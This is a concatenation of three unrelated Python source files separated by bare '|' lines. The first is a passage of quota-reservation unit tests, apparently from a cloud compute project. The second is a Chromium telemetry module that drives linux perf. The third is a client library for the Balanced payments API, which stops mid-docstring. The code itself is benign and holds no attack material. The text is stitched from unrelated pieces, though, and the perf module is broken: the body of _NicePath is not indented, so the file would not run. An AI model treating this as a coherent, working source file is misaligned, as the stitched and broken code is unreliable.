        reservation_ref.project_id = project_id
        reservation_ref.resource = resource
        reservation_ref.delta = delta
        reservation_ref.expire = expire
        reservation_ref.created_at = created_at
        reservation_ref.updated_at = updated_at
        reservation_ref.deleted_at = None
        reservation_ref.deleted = False

        return reservation_ref

    def compare_reservation(self, reservations, expected):
        """Assert the returned UUIDs exactly cover the expected records."""
        reservations = set(reservations)
        for resv in expected:
            resource = resv['resource']
            resv_obj = self.reservations_created[resource]

            self.assertIn(resv_obj.uuid, reservations)
            reservations.discard(resv_obj.uuid)

            for key, value in resv.items():
                actual = getattr(resv_obj, key)
                self.assertEqual(actual, value,
                                 "%s != %s on reservation for resource %s" %
                                 (actual, value, resource))

        self.assertEqual(len(reservations), 0)

    def test_quota_reserve_create_usages(self):
        context = FakeContext('test_project', 'test_class')
        quotas = dict(
            instances=5,
            cores=10,
            ram=10 * 1024,
        )
        deltas = dict(
            instances=2,
            cores=4,
            ram=2 * 1024,
        )
        result = sqa_api.quota_reserve(context, self.resources, quotas,
                                       deltas, self.expire, 0, 0)

        self.assertEqual(self.sync_called, set(['instances', 'cores', 'ram']))
        self.compare_usage(self.usages_created, [
                dict(resource='instances',
                     project_id='test_project',
                     in_use=0,
                     reserved=2,
                     until_refresh=None),
                dict(resource='cores',
                     project_id='test_project',
                     in_use=0,
                     reserved=4,
                     until_refresh=None),
                dict(resource='ram',
                     project_id='test_project',
                     in_use=0,
                     reserved=2 * 1024,
                     until_refresh=None),
                ])
        self.compare_reservation(result, [
                dict(resource='instances',
                     usage_id=self.usages_created['instances'],
                     project_id='test_project',
                     delta=2),
                dict(resource='cores',
                     usage_id=self.usages_created['cores'],
                     project_id='test_project',
                     delta=4),
                dict(resource='ram',
                     usage_id=self.usages_created['ram'],
                     # (fix) assert project_id for ram too, matching the
                     # other resources in this expectation list.
                     project_id='test_project',
                     delta=2 * 1024),
                ])

    def test_quota_reserve_negative_in_use(self):
        self.init_usage('test_project', 'instances', -1, 0, until_refresh=1)
        self.init_usage('test_project', 'cores', -1, 0, until_refresh=1)
        self.init_usage('test_project', 'ram', -1, 0, until_refresh=1)
        context = FakeContext('test_project', 'test_class')
        quotas = dict(
            instances=5,
            cores=10,
            ram=10 * 1024,
        )
        deltas = dict(
            instances=2,
            cores=4,
            ram=2 * 1024,
        )
        result = sqa_api.quota_reserve(context, self.resources, quotas,
                                       deltas, self.expire, 5, 0)

        self.assertEqual(self.sync_called, set(['instances', 'cores', 'ram']))
        self.compare_usage(self.usages, [
                dict(resource='instances',
                     project_id='test_project',
                     in_use=2,
                     reserved=2,
                     until_refresh=5),
                dict(resource='cores',
                     project_id='test_project',
                     in_use=2,
                     reserved=4,
                     until_refresh=5),
                dict(resource='ram',
                     project_id='test_project',
                     in_use=2,
                     reserved=2 * 1024,
                     until_refresh=5),
                ])
        self.assertEqual(self.usages_created, {})
        self.compare_reservation(result, [
                dict(resource='instances',
                     usage_id=self.usages['instances'],
                     project_id='test_project',
                     delta=2),
                dict(resource='cores',
                     usage_id=self.usages['cores'],
                     project_id='test_project',
                     delta=4),
                dict(resource='ram',
                     usage_id=self.usages['ram'],
                     project_id='test_project',
                     delta=2 * 1024),
                ])

    def test_quota_reserve_until_refresh(self):
        self.init_usage('test_project', 'instances', 3, 0, until_refresh=1)
        self.init_usage('test_project', 'cores', 3, 0, until_refresh=1)
        self.init_usage('test_project', 'ram', 3, 0, until_refresh=1)
        context = FakeContext('test_project', 'test_class')
        quotas = dict(
            instances=5,
            cores=10,
            ram=10 * 1024,
        )
        deltas = dict(
            instances=2,
            cores=4,
            ram=2 * 1024,
        )
        result = sqa_api.quota_reserve(context, self.resources, quotas,
                                       deltas, self.expire, 5, 0)

        self.assertEqual(self.sync_called, set(['instances', 'cores', 'ram']))
        self.compare_usage(self.usages, [
                dict(resource='instances',
                     project_id='test_project',
                     in_use=2,
                     reserved=2,
                     until_refresh=5),
                dict(resource='cores',
                     project_id='test_project',
                     in_use=2,
                     reserved=4,
                     until_refresh=5),
                dict(resource='ram',
                     project_id='test_project',
                     in_use=2,
                     reserved=2 * 1024,
                     until_refresh=5),
                ])
        self.assertEqual(self.usages_created, {})
        self.compare_reservation(result, [
                dict(resource='instances',
                     usage_id=self.usages['instances'],
                     project_id='test_project',
                     delta=2),
                dict(resource='cores',
                     usage_id=self.usages['cores'],
                     project_id='test_project',
                     delta=4),
                dict(resource='ram',
                     usage_id=self.usages['ram'],
                     project_id='test_project',
                     delta=2 * 1024),
                ])

    def test_quota_reserve_max_age(self):
        max_age = 3600
        record_created = (timeutils.utcnow() -
                          datetime.timedelta(seconds=max_age))
        self.init_usage('test_project', 'instances', 3, 0,
                        created_at=record_created, updated_at=record_created)
        self.init_usage('test_project', 'cores', 3, 0,
                        created_at=record_created, updated_at=record_created)
        self.init_usage('test_project', 'ram', 3, 0,
                        created_at=record_created, updated_at=record_created)
        context = FakeContext('test_project', 'test_class')
        quotas = dict(
            instances=5,
            cores=10,
            ram=10 * 1024,
        )
        deltas = dict(
            instances=2,
            cores=4,
            ram=2 * 1024,
        )
        result = sqa_api.quota_reserve(context, self.resources, quotas,
                                       deltas, self.expire, 0, max_age)

        self.assertEqual(self.sync_called, set(['instances', 'cores', 'ram']))
        self.compare_usage(self.usages, [
                dict(resource='instances',
                     project_id='test_project',
                     in_use=2,
                     reserved=2,
                     until_refresh=None),
                dict(resource='cores',
                     project_id='test_project',
                     in_use=2,
                     reserved=4,
                     until_refresh=None),
                dict(resource='ram',
                     project_id='test_project',
                     in_use=2,
                     reserved=2 * 1024,
                     until_refresh=None),
                ])
        self.assertEqual(self.usages_created, {})
        self.compare_reservation(result, [
                dict(resource='instances',
                     usage_id=self.usages['instances'],
                     project_id='test_project',
                     delta=2),
                dict(resource='cores',
                     usage_id=self.usages['cores'],
                     project_id='test_project',
                     delta=4),
                dict(resource='ram',
                     usage_id=self.usages['ram'],
                     project_id='test_project',
                     delta=2 * 1024),
                ])

    def test_quota_reserve_no_refresh(self):
        self.init_usage('test_project', 'instances', 3, 0)
        self.init_usage('test_project', 'cores', 3, 0)
        self.init_usage('test_project', 'ram', 3, 0)
        context = FakeContext('test_project', 'test_class')
        quotas = dict(
            instances=5,
            cores=10,
            ram=10 * 1024,
        )
        deltas = dict(
            instances=2,
            cores=4,
            ram=2 * 1024,
        )
        result = sqa_api.quota_reserve(context, self.resources, quotas,
                                       deltas, self.expire, 0, 0)

        self.assertEqual(self.sync_called, set([]))
        self.compare_usage(self.usages, [
                dict(resource='instances',
                     project_id='test_project',
                     in_use=3,
                     reserved=2,
                     until_refresh=None),
                dict(resource='cores',
                     project_id='test_project',
                     in_use=3,
                     reserved=4,
                     until_refresh=None),
                dict(resource='ram',
                     project_id='test_project',
                     in_use=3,
                     reserved=2 * 1024,
                     until_refresh=None),
                ])
        self.assertEqual(self.usages_created, {})
        self.compare_reservation(result, [
                dict(resource='instances',
                     usage_id=self.usages['instances'],
                     project_id='test_project',
                     delta=2),
                dict(resource='cores',
                     usage_id=self.usages['cores'],
                     project_id='test_project',
                     delta=4),
                dict(resource='ram',
                     usage_id=self.usages['ram'],
                     project_id='test_project',
                     delta=2 * 1024),
                ])

    def test_quota_reserve_unders(self):
        self.init_usage('test_project', 'instances', 1, 0)
        self.init_usage('test_project', 'cores', 3, 0)
        self.init_usage('test_project', 'ram', 1 * 1024, 0)
        context = FakeContext('test_project', 'test_class')
        quotas = dict(
            instances=5,
            cores=10,
            ram=10 * 1024,
        )
        deltas = dict(
            instances=-2,
            cores=-4,
            ram=-2 * 1024,
        )
        result = sqa_api.quota_reserve(context, self.resources, quotas,
                                       deltas, self.expire, 0, 0)

        self.assertEqual(self.sync_called, set([]))
        self.compare_usage(self.usages, [
                dict(resource='instances',
                     project_id='test_project',
                     in_use=1,
                     reserved=0,
                     until_refresh=None),
                dict(resource='cores',
                     project_id='test_project',
                     in_use=3,
                     reserved=0,
                     until_refresh=None),
                dict(resource='ram',
                     project_id='test_project',
                     in_use=1 * 1024,
                     reserved=0,
                     until_refresh=None),
                ])
        self.assertEqual(self.usages_created, {})
        self.compare_reservation(result, [
                dict(resource='instances',
                     usage_id=self.usages['instances'],
                     project_id='test_project',
                     delta=-2),
                dict(resource='cores',
                     usage_id=self.usages['cores'],
                     project_id='test_project',
                     delta=-4),
                dict(resource='ram',
                     usage_id=self.usages['ram'],
                     project_id='test_project',
                     delta=-2 * 1024),
                ])

    def test_quota_reserve_overs(self):
        self.init_usage('test_project', 'instances', 4, 0)
        self.init_usage('test_project', 'cores', 8, 0)
        self.init_usage('test_project', 'ram', 10 * 1024, 0)
        context = FakeContext('test_project', 'test_class')
        quotas = dict(
            instances=5,
            cores=10,
            ram=10 * 1024,
        )
        deltas = dict(
            instances=2,
            cores=4,
            ram=2 * 1024,
        )
        self.assertRaises(exception.OverQuota,
                          sqa_api.quota_reserve,
                          context, self.resources, quotas,
                          deltas, self.expire, 0, 0)

        self.assertEqual(self.sync_called, set([]))
        # Usages must be untouched and no records created on failure.
        self.compare_usage(self.usages, [
                dict(resource='instances',
                     project_id='test_project',
                     in_use=4,
                     reserved=0,
                     until_refresh=None),
                dict(resource='cores',
                     project_id='test_project',
                     in_use=8,
                     reserved=0,
                     until_refresh=None),
                dict(resource='ram',
                     project_id='test_project',
                     in_use=10 * 1024,
                     reserved=0,
                     until_refresh=None),
                ])
        self.assertEqual(self.usages_created, {})
        self.assertEqual(self.reservations_created, {})

    def test_quota_reserve_reduction(self):
        self.init_usage('test_project', 'instances', 10, 0)
        self.init_usage('test_project', 'cores', 20, 0)
        self.init_usage('test_project', 'ram', 20 * 1024, 0)
        context = FakeContext('test_project', 'test_class')
        quotas = dict(
            instances=5,
            cores=10,
            ram=10 * 1024,
        )
        deltas = dict(
            instances=-2,
            cores=-4,
            ram=-2 * 1024,
        )
        result = sqa_api.quota_reserve(context, self.resources, quotas,
                                       deltas, self.expire, 0, 0)

        self.assertEqual(self.sync_called, set([]))
        self.compare_usage(self.usages, [
                dict(resource='instances',
                     project_id='test_project',
                     in_use=10,
                     reserved=0,
                     until_refresh=None),
                dict(resource='cores',
                     project_id='test_project',
                     in_use=20,
                     reserved=0,
                     until_refresh=None),
                dict(resource='ram',
                     project_id='test_project',
                     in_use=20 * 1024,
                     reserved=0,
                     until_refresh=None),
                ])
        self.assertEqual(self.usages_created, {})
        self.compare_reservation(result, [
                dict(resource='instances',
                     usage_id=self.usages['instances'],
                     project_id='test_project',
                     delta=-2),
                dict(resource='cores',
                     usage_id=self.usages['cores'],
                     project_id='test_project',
                     delta=-4),
                dict(resource='ram',
                     usage_id=self.usages['ram'],
                     project_id='test_project',
                     delta=-2 * 1024),
                ])
class NoopQuotaDriverTestCase(test.TestCase):
    """The no-op driver reports every quota as unlimited (-1)."""

    def setUp(self):
        super(NoopQuotaDriverTestCase, self).setUp()

        self.flags(quota_instances=10,
                   quota_cores=20,
                   quota_ram=50 * 1024,
                   quota_floating_ips=10,
                   quota_metadata_items=128,
                   quota_injected_files=5,
                   quota_injected_file_content_bytes=10 * 1024,
                   quota_injected_file_path_bytes=255,
                   quota_security_groups=10,
                   quota_security_group_rules=20,
                   reservation_expire=86400,
                   until_refresh=0,
                   max_age=0,
                   )

        # Whatever the flags say, the noop driver always answers -1.
        self.expected_quotas = {r: -1 for r in quota.QUOTAS._resources}
        self.driver = quota.NoopQuotaDriver()

    def test_get_defaults(self):
        # Use our pre-defined resources
        resources = quota.QUOTAS._resources
        self.assertEqual(self.expected_quotas,
                         self.driver.get_defaults(None, resources))

    def test_get_class_quotas(self):
        resources = quota.QUOTAS._resources
        self.assertEqual(self.expected_quotas,
                         self.driver.get_class_quotas(None, resources,
                                                      'test_class'))

    def test_get_class_quotas_no_defaults(self):
        resources = quota.QUOTAS._resources
        self.assertEqual(self.expected_quotas,
                         self.driver.get_class_quotas(None, resources,
                                                      'test_class', False))

    def test_get_project_quotas(self):
        resources = quota.QUOTAS._resources
        self.assertEqual(self.expected_quotas,
                         self.driver.get_project_quotas(None, resources,
                                                        'test_project'))

    def test_get_project_quotas_no_defaults(self):
        resources = quota.QUOTAS._resources
        self.assertEqual(self.expected_quotas,
                         self.driver.get_project_quotas(None, resources,
                                                        'test_project',
                                                        defaults=False))

    def test_get_project_quotas_no_usages(self):
        resources = quota.QUOTAS._resources
        self.assertEqual(self.expected_quotas,
                         self.driver.get_project_quotas(None, resources,
                                                        'test_project',
                                                        usages=False))
|
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import re
import signal
import subprocess
import sys
import tempfile
from pylib.device import device_errors # pylint: disable=F0401
from telemetry.core import platform
from telemetry.core.platform import profiler
from telemetry.core.platform.profiler import android_profiling_helper
from telemetry.core import util
from telemetry.util import support_binaries
util.AddDirToPythonPath(util.GetChromiumSrcDir(), 'build', 'android')
from pylib.perf import perf_control # pylint: disable=F0401
# Flags passed to `perf record` on every platform.
_PERF_OPTIONS = [
    # In perf 3.13 --call-graph requires an argument, so use the -g short-hand
    # which does not.
    '-g',
    # Increase sampling frequency for better coverage.
    '--freq', '2000',
]
# Extra flags appended when recording on an Android device.
_PERF_OPTIONS_ANDROID = [
    # Increase priority to avoid dropping samples. Requires root.
    '--realtime', '80',
]
def _NicePath(path):
rel_path = os.path.relpath(path, os.curdir)
return rel_path if len(rel_path) < len(path) else path
def _PrepareHostForPerf():
  """Unrestrict kernel symbol addresses so perf can resolve kernel frames.

  Writes '0' to /proc/sys/kernel/kptr_restrict via sudo, but only when the
  current value is not already '0'. May prompt for a sudo password.
  """
  kptr_file = '/proc/sys/kernel/kptr_restrict'
  with open(kptr_file) as f:
    if f.read().strip() != '0':
      logging.warning('Making kernel symbols unrestricted. You might have to '
                      'enter your password for "sudo".')
      with tempfile.NamedTemporaryFile() as zero:
        zero.write('0')
        zero.flush()
        # Copy a temp file under sudo instead of shell-redirecting, so only
        # the `cp` itself needs elevated privileges.
        subprocess.call(['/usr/bin/sudo', 'cp', zero.name, kptr_file])
def _InstallPerfHost():
  """Install the host-side perfhost binary if needed; return its path."""
  perfhost_name = android_profiling_helper.GetPerfhostName()
  host_platform = platform.GetHostPlatform()
  if not host_platform.CanLaunchApplication(perfhost_name):
    host_platform.InstallApplication(perfhost_name)
  return support_binaries.FindPath(perfhost_name, 'x86_64', 'linux')
class _SingleProcessPerfProfiler(object):
  """An internal class for using perf for a given process.

  On android, this profiler uses pre-built binaries from AOSP.
  See more details in prebuilt/android/README.txt.
  """
  def __init__(self, pid, output_file, browser_backend, platform_backend,
               perf_binary, perfhost_binary):
    self._pid = pid
    self._browser_backend = browser_backend
    self._platform_backend = platform_backend
    self._output_file = output_file
    # Unbuffered temp file capturing perf's stdout/stderr for diagnostics.
    self._tmp_output_file = tempfile.NamedTemporaryFile('w', 0)
    self._is_android = platform_backend.GetOSName() == 'android'
    self._perf_binary = perf_binary
    self._perfhost_binary = perfhost_binary
    cmd_prefix = []
    perf_args = ['record', '--pid', str(pid)]
    if self._is_android:
      # On Android, run the device-side perf binary via `adb shell`; output
      # is staged on /sdcard and pulled back in CollectProfile().
      cmd_prefix = ['adb', '-s', browser_backend.adb.device_serial(), 'shell',
                    perf_binary]
      perf_args += _PERF_OPTIONS_ANDROID
      output_file = os.path.join('/sdcard', 'perf_profiles',
                                 os.path.basename(output_file))
      self._device_output_file = output_file
      browser_backend.adb.RunShellCommand(
          'mkdir -p ' + os.path.dirname(self._device_output_file))
      browser_backend.adb.RunShellCommand('rm -f ' + self._device_output_file)
    else:
      cmd_prefix = [perf_binary]
      perf_args += ['--output', output_file] + _PERF_OPTIONS
    self._proc = subprocess.Popen(cmd_prefix + perf_args,
        stdout=self._tmp_output_file, stderr=subprocess.STDOUT)

  def CollectProfile(self):
    """Stop perf, validate its exit status, and return the profile path.

    Also prints the `perf report` command line the user should run to view
    the profile (with --symfs/--kallsyms/--objdump flags on Android).
    """
    if ('renderer' in self._output_file and
        not self._is_android and
        not self._platform_backend.GetCommandLine(self._pid)):
      logging.warning('Renderer was swapped out during profiling. '
                      'To collect a full profile rerun with '
                      '"--extra-browser-args=--single-process"')
    if self._is_android:
      device = self._browser_backend.adb.device()
      try:
        binary_name = os.path.basename(self._perf_binary)
        # SIGINT asks the on-device perf to stop and flush its output.
        device.KillAll(binary_name, signum=signal.SIGINT, blocking=True)
      except device_errors.CommandFailedError:
        logging.warning('The perf process could not be killed on the device.')
    self._proc.send_signal(signal.SIGINT)
    exit_code = self._proc.wait()
    try:
      # perf exits with 128 when it lacks permission to sample; -2 is the
      # expected status after our SIGINT.
      if exit_code == 128:
        raise Exception(
            """perf failed with exit code 128.
Try rerunning this script under sudo or setting
/proc/sys/kernel/perf_event_paranoid to "-1".\nOutput:\n%s""" %
            self._GetStdOut())
      elif exit_code not in (0, -2):
        raise Exception(
            'perf failed with exit code %d. Output:\n%s' % (exit_code,
                                                            self._GetStdOut()))
    finally:
      self._tmp_output_file.close()
    cmd = '%s report -n -i %s' % (_NicePath(self._perfhost_binary),
                                  self._output_file)
    if self._is_android:
      device = self._browser_backend.adb.device()
      device.old_interface.Adb().Pull(self._device_output_file,
                                      self._output_file)
      required_libs = \
          android_profiling_helper.GetRequiredLibrariesForPerfProfile(
              self._output_file)
      symfs_root = os.path.dirname(self._output_file)
      kallsyms = android_profiling_helper.CreateSymFs(device,
                                                      symfs_root,
                                                      required_libs,
                                                      use_symlinks=True)
      cmd += ' --symfs %s --kallsyms %s' % (symfs_root, kallsyms)
      # Point perf report at an objdump from the Android toolchain; any one
      # library is enough to locate the toolchain, hence the break.
      for lib in required_libs:
        lib = os.path.join(symfs_root, lib[1:])
        if not os.path.exists(lib):
          continue
        objdump_path = android_profiling_helper.GetToolchainBinaryPath(
            lib, 'objdump')
        if objdump_path:
          cmd += ' --objdump %s' % _NicePath(objdump_path)
          break
    print 'To view the profile, run:'
    print ' ', cmd
    return self._output_file

  def _GetStdOut(self):
    """Return everything perf wrote to stdout/stderr so far ('' on error)."""
    self._tmp_output_file.flush()
    try:
      with open(self._tmp_output_file.name) as f:
        return f.read()
    except IOError:
      return ''
class PerfProfiler(profiler.Profiler):
  """Profiles each browser process with linux `perf`.

  One _SingleProcessPerfProfiler is started per process (zygote processes
  are skipped). On Android the device is additionally switched into perf
  profiling mode for the duration of the run.
  """

  def __init__(self, browser_backend, platform_backend, output_path, state):
    super(PerfProfiler, self).__init__(
        browser_backend, platform_backend, output_path, state)
    process_output_file_map = self._GetProcessOutputFileMap()
    self._process_profilers = []
    self._perf_control = None
    perf_binary = perfhost_binary = _InstallPerfHost()
    try:
      if platform_backend.GetOSName() == 'android':
        device = browser_backend.adb.device()
        perf_binary = android_profiling_helper.PrepareDeviceForPerf(device)
        self._perf_control = perf_control.PerfControl(device)
        self._perf_control.SetPerfProfilingMode()
      else:
        _PrepareHostForPerf()
      for pid, output_file in process_output_file_map.iteritems():
        if 'zygote' in output_file:
          continue
        self._process_profilers.append(
            _SingleProcessPerfProfiler(
                pid, output_file, browser_backend, platform_backend,
                perf_binary, perfhost_binary))
    except:
      # Restore the device's default perf mode before re-raising, so a
      # failed setup does not leave the device in profiling mode.
      if self._perf_control:
        self._perf_control.SetDefaultPerfMode()
      raise

  @classmethod
  def name(cls):
    """Profiler name used on the command line."""
    return 'perf'

  @classmethod
  def is_supported(cls, browser_type):
    # NOTE(review): 'linux2' is the Python 2 value of sys.platform; this
    # check would always fail under Python 3 ('linux').
    if sys.platform != 'linux2':
      return False
    if platform.GetHostPlatform().GetOSName() == 'chromeos':
      return False
    return True

  @classmethod
  def CustomizeBrowserOptions(cls, browser_type, options):
    # Sandboxed processes cannot be attached to by perf.
    options.AppendExtraBrowserArgs([
        '--no-sandbox',
        '--allow-sandbox-debugging',
    ])

  def CollectProfile(self):
    """Stop all per-process profilers and return their output file paths."""
    if self._perf_control:
      self._perf_control.SetDefaultPerfMode()
    output_files = []
    for single_process in self._process_profilers:
      output_files.append(single_process.CollectProfile())
    return output_files

  @classmethod
  def GetTopSamples(cls, file_name, number):
    """Parses the perf generated profile in |file_name| and returns a
    {function: period} dict of the |number| hottests functions.
    """
    assert os.path.exists(file_name)
    with open(os.devnull, 'w') as devnull:
      _InstallPerfHost()
      # '-t ^' makes perf report emit caret-separated fields for parsing.
      report = subprocess.Popen(
          [android_profiling_helper.GetPerfhostName(),
           'report', '--show-total-period', '-U', '-t', '^', '-i', file_name],
          stdout=subprocess.PIPE, stderr=devnull).communicate()[0]
    period_by_function = {}
    for line in report.split('\n'):
      if not line or line.startswith('#'):
        continue
      fields = line.split('^')
      if len(fields) != 5:
        continue
      period = int(fields[1])
      function = fields[4].partition(' ')[2]
      function = re.sub('<.*>', '', function)  # Strip template params.
      function = re.sub('[(].*[)]', '', function)  # Strip function params.
      period_by_function[function] = period
      if len(period_by_function) == number:
        break
    return period_by_function
|
|
from __future__ import unicode_literals
import uritemplate
import wac
from balanced import exc, config, utils
# Global registry mapping resource type names to Resource subclasses.
registry = wac.ResourceRegistry(route_prefix='/')
class JSONSchemaCollection(wac.ResourceCollection):
    # Collection that exposes its canonical link as ``href`` (alias of uri).
    @property
    def href(self):
        """URI of this collection."""
        return self.uri
class ObjectifyMixin(wac._ObjectifyMixin):
    """Turns raw JSON:API-style payloads into resource attributes."""

    def _objectify(self, resource_cls, **fields):
        # setting values locally, not from server
        if 'links' not in fields:
            for key, value in fields.iteritems():
                setattr(self, key, value)
        else:
            # A 'links' key marks a full server response envelope.
            self._construct_from_response(**fields)

    def _construct_from_response(self, **payload):
        """Populate self (or child collections) from a response envelope."""
        payload = self._hydrate(payload)
        meta = payload.pop('meta', None)
        if isinstance(self, wac.Page):
            for key, value in meta.iteritems():
                setattr(self, key, value)
        # the remaining keys here are just hypermedia resources
        for _type, resources in payload.iteritems():
            # Singular resources are represented as JSON objects. However,
            # they are still wrapped inside an array:
            cls = Resource.registry[_type]
            for resource_body in resources:
                # if we couldn't determine the type of this object we use a
                # generic resource object, target that instead.
                if isinstance(self, (cls, Resource)):
                    # we are loading onto our self, self is the target
                    target = self
                else:
                    target = cls()
                for key, value in resource_body.iteritems():
                    if key in ('links',):
                        continue
                    setattr(target, key, value)
                # if loading into a collection
                if target != self:
                    # ensure that we have a collection to hold this item
                    if not hasattr(self, _type):
                        setattr(self, _type, [])
                    getattr(self, _type).append(target)

    @classmethod
    def _hydrate(cls, payload):
        """
        Construct links for objects.

        Expands each URI template in the payload's top-level 'links' map
        against every item of the corresponding collection, attaching
        either a ``*_href`` string (singular), None (unresolvable), or a
        JSONSchemaCollection (collection) to the item.
        """
        links = payload.pop('links', {})
        for key, uri in links.iteritems():
            variables = uritemplate.variables(uri)
            # marketplaces.card_holds
            collection, resource_type = key.split('.')
            item_attribute = item_property = resource_type
            # if parsed from uri then retrieve. e.g. customer.id
            for item in payload[collection]:
                # find type, fallback to Resource if we can't determine the
                # type e.g. marketplace.owner_customer
                collection_type = Resource.registry.get(resource_type,
                                                        Resource)
                def extract_variables_from_item(item, variables):
                    # Yield (template-variable, value) pairs resolvable
                    # from the item's links or its own attributes.
                    for v in variables:
                        _, item_attribute = v.split('.')
                        # HACK: https://github.com/PoundPay/balanced/issues/184
                        if item_attribute == 'self':
                            item_attribute = 'id'
                        item_value = item['links'].get(
                            item_attribute, item.get(item_attribute)
                        )
                        if item_value:
                            yield v, item_value
                item_variables = dict(
                    extract_variables_from_item(item, variables))
                # expand variables if we have them, else this is a link like
                # /debits
                if item_variables:
                    parsed_link = uritemplate.expand(uri, item_variables)
                else:
                    parsed_link = uri
                # check if this is a collection or a singular item
                if any(
                    parsed_link.endswith(value)
                    for value in item_variables.itervalues()
                ):
                    # singular
                    if not item_property.endswith('_href'):
                        item_property += '_href'
                    lazy_href = parsed_link
                elif '{' in parsed_link and '}' in parsed_link:
                    # the link is of the form /asdf/{asdf} which means
                    # that the variables could not be resolved as it
                    # was None. Instead of making it into a page object
                    # we explicitly set it to None to represent the
                    # attribute is None
                    lazy_href = None
                else:
                    # collection
                    lazy_href = JSONSchemaCollection(
                        collection_type, parsed_link)
                # setdefault: never clobber a value already on the item.
                item.setdefault(item_property, lazy_href)
        return payload
class JSONSchemaPage(wac.Page, ObjectifyMixin):
    # A single page of a paginated collection response.
    @property
    def items(self):
        """The resources on this page, or [] when the page is empty."""
        try:
            try:
                return getattr(self, self.resource_cls.type)
            except AttributeError:
                # horrid hack because event callbacks are misnamed.
                return self.event_callbacks
        except AttributeError:
            # Notice:
            # there is no resources key in the response from server
            # if the list is empty, so when we try to get something like
            # `debits`, an AttributeError will be raised. Not sure is this
            # behavior a bug of server, but anyway, this is just a workaround
            # here for solving the problem. The issue was posted here
            # https://github.com/balanced/balanced-python/issues/93
            return []
class JSONSchemaResource(wac.Resource, ObjectifyMixin):
    """Base resource with save/delete and lazy hypermedia-link traversal."""

    collection_cls = JSONSchemaCollection
    page_cls = JSONSchemaPage

    def save(self):
        """Create (POST) or update (PUT) this resource on the server.

        The instance's __dict__ is replaced wholesale with the server's
        response, so locally-set attributes not echoed back are dropped.
        """
        cls = type(self)
        attrs = self.__dict__.copy()
        href = attrs.pop('href', None)
        if not href:
            if not cls.uri_gen or not cls.uri_gen.root_uri:
                raise TypeError(
                    'Unable to create {0} resources directly'.format(
                        cls.__name__
                    )
                )
            href = cls.uri_gen.root_uri
        # An 'id' means the resource already exists server-side -> PUT.
        method = cls.client.put if 'id' in attrs else cls.client.post
        # Serialize nested resources to their hrefs; drop collections.
        attrs = dict(
            (k, v.href if isinstance(v, Resource) else v)
            for k, v in attrs.iteritems()
            if not isinstance(v, (cls.collection_cls))
        )
        resp = method(href, data=attrs)
        instance = self.__class__(**resp.data)
        self.__dict__.clear()
        self.__dict__.update(instance.__dict__)
        return self

    def delete(self):
        """Delete this resource on the server."""
        self.client.delete(self.href)

    def __dir__(self):
        return self.__dict__.keys()

    def __getattr__(self, item):
        # Lazily fetch `foo` via the stored `foo_href` link, then cache the
        # fetched resource on the instance so later access is a plain lookup.
        if isinstance(item, basestring):
            suffix = '_href'
            if suffix not in item:
                href = getattr(self, item + suffix, None)
                if href:
                    # Pluralized name keys the registry; fall back to Resource.
                    item_type = Resource.registry.get(item + 's', Resource)
                    setattr(self, item, item_type.get(href))
                    return getattr(self, item)
        raise AttributeError(
            "'{0}' has no attribute '{1}'".format(
                self.__class__.__name__, item
            )
        )
class Resource(JSONSchemaResource):
    """Abstract base type for all Balanced API resources."""

    client = config.client
    registry = registry
    uri_gen = wac.URIGen('/resources', '{resource}')

    def unstore(self):
        """Alias for delete()."""
        return self.delete()

    @classmethod
    def fetch(cls, href):
        """Alias for get()."""
        return cls.get(href)

    @classmethod
    def get(cls, href):
        if not href.startswith('/resources'):
            return super(Resource, cls).get(href)
        # hackety hack hax: /resources is an abstract endpoint, so sniff
        # the concrete type out of the response body rather than handing
        # back a bare Resource instance.
        resp = cls.client.get(href)
        type_keys = [
            k for k in resp.data.keys() if k not in ('links', 'meta')
        ]
        if type_keys:
            return Resource.registry.get(type_keys[0], cls)(**resp.data)
        return cls(**resp.data)
class Marketplace(Resource):
    """
    A Marketplace represents your central broker for all operations on the
    Balanced API.

    A Marketplace has a single `owner_customer` which represents your person or
    business.

    All Resources apart from APIKeys are associated with a Marketplace.

    A Marketplace has an escrow account which receives all funds from Debits
    that are not associated with Orders. The sum of the escrow (`in_escrow`) is
    (Debits - Refunds + Reversals - Credits).
    """
    # Registry key used by ObjectifyMixin to map payloads to this class.
    type = 'marketplaces'
    uri_gen = wac.URIGen('/marketplaces', '{marketplace}')

    @utils.classproperty
    def mine(cls):
        """
        Returns an instance representing the marketplace associated with the
        current API key used for this request.
        """
        return cls.query.one()
    # Backwards-compatible alias for ``mine``.
    my_marketplace = mine
class APIKey(Resource):
    """
    Credential used to authenticate Balanced API operations; one must exist
    before a Marketplace can be created.

    **NOTE:** Never give out or expose your APIKey.  POST to this endpoint
    to mint new keys and DELETE any old ones.
    """

    type = 'api_keys'
    uri_gen = wac.URIGen('/api_keys', '{api_key}')
class CardHold(Resource):
    """An authorization of funds on a Card, capturable into a Debit."""

    type = 'card_holds'
    uri_gen = wac.URIGen('/card_holds', '{card_hold}')

    def cancel(self):
        """Void this hold and persist that state."""
        self.is_void = True
        return self.save()

    def capture(self, **kwargs):
        """Capture the held funds, producing a Debit."""
        return Debit(href=self.debits.href, **kwargs).save()
class Transaction(Resource):
    """
    Base type for any movement of funds to or from an escrow account:
    Credit, Debit, Refund, or Reversal.

    A Transaction attached to an Order settles against that Order's escrow
    account instead of the Marketplace's.
    """

    type = 'transactions'
class Credit(Transaction):
    """
    A transfer of funds out of your Marketplace's escrow account to a
    FundingInstrument; created via FundingInstrument.credit().
    """

    type = 'credits'
    uri_gen = wac.URIGen('/credits', '{credit}')

    def reverse(self, **kwargs):
        """
        Reverse this Credit.  With no explicit amount the entire Credit is
        reversed; many Reversals may be created up to the Credit's total.

        :rtype: Reversal
        """
        return Reversal(href=self.reversals.href, **kwargs).save()
class Debit(Transaction):
    """
    A transfer of funds from a FundingInstrument into your Marketplace's
    escrow account.

    May be created directly (implicitly creating the associated CardHold
    where the instrument supports one) or as the result of capturing an
    existing CardHold.
    """

    type = 'debits'
    uri_gen = wac.URIGen('/debits', '{debit}')

    def refund(self, **kwargs):
        """
        Refund this Debit.  With no explicit amount the entire Debit is
        refunded; many Refunds may be created up to the Debit's total.

        :rtype: Refund
        """
        return Refund(href=self.refunds.href, **kwargs).save()
class Refund(Transaction):
    """
    A reversal of funds from a Debit.  A Debit can carry many Refunds up to
    its original amount; funds return to your Marketplace's escrow account
    in proportion to the Refund amount.
    """

    type = 'refunds'
    uri_gen = wac.URIGen('/refunds', '{refund}')
class Reversal(Transaction):
    """
